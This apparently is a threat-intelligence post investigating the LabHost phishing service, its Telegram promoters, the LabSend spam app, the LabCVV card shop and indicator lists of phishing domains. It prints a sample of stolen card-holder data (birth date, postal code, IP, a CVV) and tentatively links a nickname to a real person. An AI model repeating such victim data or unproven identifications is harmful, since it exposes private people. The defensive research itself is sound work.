The first mentions of “Labhost” from August 24, 2021, were found in the Montreal Telegram chat @mtltrap (🇨🇦𝗠𝗧𝗟 𝗧𝗥𝗔𝗣𝗦𝗧𝗔𝗥𝗦🇨🇦). Currently, the chat has been deleted, but the messages have been archived by the Group-IB Threat Intelligence system.
Messages were sent from accounts https://t.me/MrSmartICQ (id 724887901) and https://t.me/houdini13 (id 882956983). Both accounts are still active, have not changed their usernames, and belong to the same individuals as in 2021.
On September 6, 2021, the first message was sent with a link to the Telegram channel https://t.me/labhost.
The channel was created on August 17, 2021, and the first messages appeared on August 29, 2021. The Telegram channel remains active and is still used by “Labhost”.
On September 7, 2021, @MrSmartICQ announced the first domain “LabHost” – https://labhost[.]cc. A similar message was also published on the Telegram channel @labhost.
The third account promoting “LabHost” was https://t.me/Zimna514 (id 2012343631). On October 3, 2021, on the Telegram channel @mtltrap, he posted a message with the new domain https://labhost[.]co. Unlike the other two accounts, @Zimna514 is already deleted.
Houdini13 also owns the service “The Lab Refunds” with the Telegram channels https://t.me/TheLabRefunds and https://t.me/labrefundvouch. This service also operates only in Canada. We assume that this way it is possible to purchase stuff with a stolen card and refund the money to the threat actor’s or a drop card.
Using stolen accounts or credit card data obtained through phishing, fraudsters purchase stuff on legitimate online stores such as Amazon, Zara, Puma, Asos, Monos. The service “The Lab Refunds” assists them in refunds.
In August 2023, @houdini13 also advertised a service for spam mailings “Lab Send” (https://t.me/LabSend, https://labsend[.]co).
In addition to the clear focus of the “LabHost” service on Canada and advertising in the Montreal chat, there are also indications that individuals associated with “LabHost” are located in Canada.
This mainly concerns the user @houdini13. Since September 2021, he has been selling “Canada profiles”.
For this purpose, he created the Telegram bot @HoudiniProfiles_Bot, later changed to https://t.me/ProfileShop_Bot, which still works.
We found 115 messages advertising @HoudiniProfiles_Bot in Telegram chat @mtltrap and only one of them was not sent by @houdini13. It was a message with completely matching text, but it was sent by @Zimna514.
In August and September 2021, “LabHost” was advertised by the accounts @MrSmartICQ and @houdini13, but since October 2021, it has been advertised by @MrSmartICQ and @Zimna514. We assume that the accounts @houdini13 and @Zimna514 belonged to the same person.
The most interesting mention of Canada was in 2021. @houdini13 in the already deleted telegram chat @NoirsRefunds was looking for Rolex, and in September he was already trying to refund it from Canada.
As for the account @Zimna514, although it has now been deleted, it is a very unique username. A search for “Zimna514” revealed that only one person uses this nickname, coincidentally a Canadian citizen. However, at the moment, we do not have enough data to assert his involvement with “LabHost”.
There is less public information about the account @MrSmartICQ, but it is also associated with Canada.
Even a year before the creation of “LabHost“, in September 2020, @MrSmartICQ was looking for a database of profiles from Canada.
Interestingly, in 2022, he was looking for a designer to improve his website and apparently found one.
LabSend spam management service
LabSend spam service was initially released in 2022. According to their TG channel it is a device manager platform which facilitates spam campaign via SMS/MMS messages.
Key Features
- Unlimited Devices
- SMS and MMS Sending
- Syntax Messaging (message randomizer)
- Auto Responder
- Custom Delays
- Message Templates
- Multiple Languages
- Responsive Support
- Constant Updates
Moreover the ad says that combining LabHost together with LabSend maximizes results.
All marketing materials (like videos, GUI) are created in a very professional way. The subscription is pretty cheap for a such kind of services:
Users of LabSend service should download and install an APK on their Android devices, and then via the web platform they can perform spam campaigns sending phishing links to victims.
Group-IB found this APK uploaded to VirusTotal on 2023-11-20 with SHA1 hash cda695baad4be4f6067195395997360337a43d6f . Based on our RE analysis it uses labsend[.]co and files.labsend[.]co as C2 addresses.
LabCVV Card Shop
Official TG group of LabHost on 3rd of January 2024 started to advertise LabCVV credit card shop.
The credit card shop has a very similar UI to LabHost service. This similarity and the fact that CC shop is promoted by LabHost lead to the assumption that both services belong to the same criminal group behind OR at least were developed by the same web designer.
Example of purchased data:
|============ Details ===========| | Full Name: | Address: | City: Laval | Postal Code: H7T 0E2 | Phone: | DOB: 10/09/1953 | | Date: 09:15:01pm | Browser: Mobile Safari | OS: iOS | Location: Montreal, Canada | IP Geo: http://www.geoiptool.com/?IP=142.169.16.238 | User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 15_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.5 Mobile/15E148 Safari/604.1 | |============ Card Info ===========| | Card: | Expiry: 03/23 | Cvv: | | Bank: | Scheme: VISA | Type: DEBIT | Brand: TRADITIONAL | Bin: | Country: CA | Prepaid: NON-PREPAID | | Time: 09:15:59pm | |============ Card Info ===========| | Card: | Expiry: 03/23 | Cvv: 413 | | Bank: | Scheme: VISA | Type: DEBIT | Brand: TRADITIONAL | Bin: | Country: CA | Prepaid: NON-PREPAID |
Recommendations
For common users
- Always be cautious and fully aware of anything sent to you, even if you think it may be legitimate.
- Do not click on any links that you are not 100% confident are real
- Double check the address of a website is the official one before you submit any information
- If the link comes from someone you know, confirm with that person using another way of communication
- Contact the organization thatwhich sent you a link to confirm they have really sent you that message
- If in doubt, use services like URLScan or VirusTotal to quickly scan the URL you have been sent, and look for red flags
- If you think you may be a victim of a phishing attack, contact your bank and local enforcement agencies immediately with information about the organization being impersonated by the fraudsters and the police. They can issue an alert which may ultimately raise awareness and reduce the victim count.
- Keep in mind that usually official organizations do not use URL shorteners, so links leading to bit.ly, s.id, tny.sh and others, are very suspicious and you should double check the final destination
- Report any identified phishing email or SMS to fraudehelpdesk.nl, scamadviser.com, organizations that were lured. These reports aid cybersecurity professionals to investigate and take action against fraudulent websites, in addition to helping protect other victims.
For targeted businesses
Fighting this type of threat relies on different ways. Let’s enumerate them in order of efficiency:
- Continuous monitoring and detection of phishing websites and their take-down process
- Analysing the infrastructure and taking it down
- A state-of-the-art anti-fraud solution that can detect and block unauthorized logins and transactions
- An investigation focused on finding identities of criminals behind the Phaas.
While the first two approaches can temporarily mitigate the threat, they require continuous investments and don’t guarantee 100% coverage.
At Group-IB we advise our corporate customers to investigate specific phenomena and identify criminals behind a scheme. For financial organizations we recommend installing Group-IB’s Fraud Protection Service.
Our Fraud Protection team recommends:
- Continuous surveillance of new threats and beginning the phishing site takedown process using Threat Intelligence and Digital risk or Brand protection providers. These services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk.
- Implement active call detection using session monitoring systems, Abnormal call duration, Remote Access Detection, parallel access to a user account from different devices, and Access from well-known fraudulent devices.
According to the Group-IB Fraud Matrix, the following detection and mitigation steps for this scheme are required:
Resource Development
Internal mule accounts
- Detections:
Data Source | Data Component | Description |
Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions |
Trust abuse
Mitigations:
Data Source | Data Component | Description |
Threat intelligence providers | Dark web, instant messages, monitoring | Threat intelligence services help an organization generate its threat intelligence information and track trends to inform defensive priorities to mitigate risk. |
Digital risk or brand protection providers | Brand abuse | Digital or brand protection services help an organization track illegitimate brand usage to inform defensive priorities to mitigate risk. |
Account access
Detections:
Data Source | Data Component | Description |
Sessional Monitoring | Non-monetary transaction | Parallel access to a user account from different devices |
Device fingerprinting | access from well-known fraudulent devices. |
Perform fraud
Detections:
Data Source | Data Component | Description |
Transaction Monitoring | Real-time Transaction Monitoring | Flaggin unusual patterns such as frequent transfers to newly created or unrelated accounts, high-volume transactions inconsistent with typical customer behaviour, and transfers to accounts with no apparent legitimate connection to the sender. |
Sessional Monitoring | Device fingerprinting | Detection of links between unrelated accounts via devices, locations and transactions |
Try Group-IB Fraud Protection now
Eliminate fraud across all digital channels in real time
IOCs
Fraudulent infrastructure
Domain name | Registrar | IP address | Date of activity |
lab-host.ru | nic.ru, Russia | 45.148.244.237 | July 2023 – Now |
labcvv.su | nic.ru, Russia | 104.21.38.192 | August 2022 – Now |
labsend.co | namecheap.com, US | 188.214.128.63 | December 2023 – Now |
api2-4hdfix74ks.co | namesilo.com, US | 188.114.96.1 | June 2023 – Now |
instapi-1xoa93z90o348fz.co | namesilo.com, US | 188.114.96.1 | June 2023 – Now |
labhost.ru | reg.ru, Russia | 185.178.208.34 | November 2021 – December 2022 |
labhost.xyz | nic.ru, Russia | 109.70.26.37 | November 2021 |
labhost.co | tucows.com, Canada | 185.178.208.34 | October 2021 |
labhost.cc | namesilo.com, US | 185.178.208.34 | September 2021 |
labhost-alt1.ru | nic.ru, Russia | – | – |
labhost-backup.ru | nic.ru, Russia | 91.215.43.242 | February 2024 – Now |
Phishing pages belong to LabHost owners
IP address | Registrar | IP address |
climateactionincentive-resident.info | namesilo.com, US | 45.148.244.237 |
yearlygift-freedommobile.info | namesilo.com, US | 159.253.120.116 |
thisisyours.top | namesilo.com, US | 159.253.120.116 |
sdn-hme.top | namesilo.com, US | 159.253.120.116 |
rogers-yearlygift.info | namesilo.com, US | 159.253.120.116 |
resimaigu.info | namesilo.com, US | 159.253.120.116 |
online-icd-zco-db.top | namesilo.com, US | 159.253.120.116 |
lnk-online.top | namesilo.com, US | 159.253.120.116 |
imthenew.top | namesilo.com, US | 159.253.120.116 |
grdn-hme.top | namesilo.com, US | 159.253.120.116 |
gdn-hme.top | namesilo.com, US | 159.253.120.116 |
freedommobile-giftpay.info | namesilo.com, US | 159.253.120.116 |
freedommobile-gift.info | namesilo.com, US | 159.253.120.116 |
elmaronf.info | namesilo.com, US | 159.253.120.116 |
caip-deposit-rebate.info | namesilo.com, US | 159.253.120.116 |
scribbledromance.live | namesilo.com, US | 159.253.120.116 |
online-db-batch.top | namesilo.com, US | 159.253.120.116 |
online-db-batch.top | namesilo.com, US | 159.253.120.116 |
icd-zco.gdn-hme.top | namesilo.com, US | 159.253.120.116 |
freedom-yearlygift.info | namesilo.com, US | 159.253.120.116 |
clients.groupe-dn.info | namesilo.com, US | 159.253.120.116 |
gov-return-cad.info | namesilo.com, US | 185.113.8.38 |
freedommobile-credit.info | namesilo.com, US | 185.113.8.38 |
freedommobile-credit.com | Nicenic.NET, Hong Kong | 185.113.8.38 |
climateactionincentive-rebatepay.info | namesilo.com, US | 185.113.8.38 |
https://www.group-ib.com/blog/labhost-operation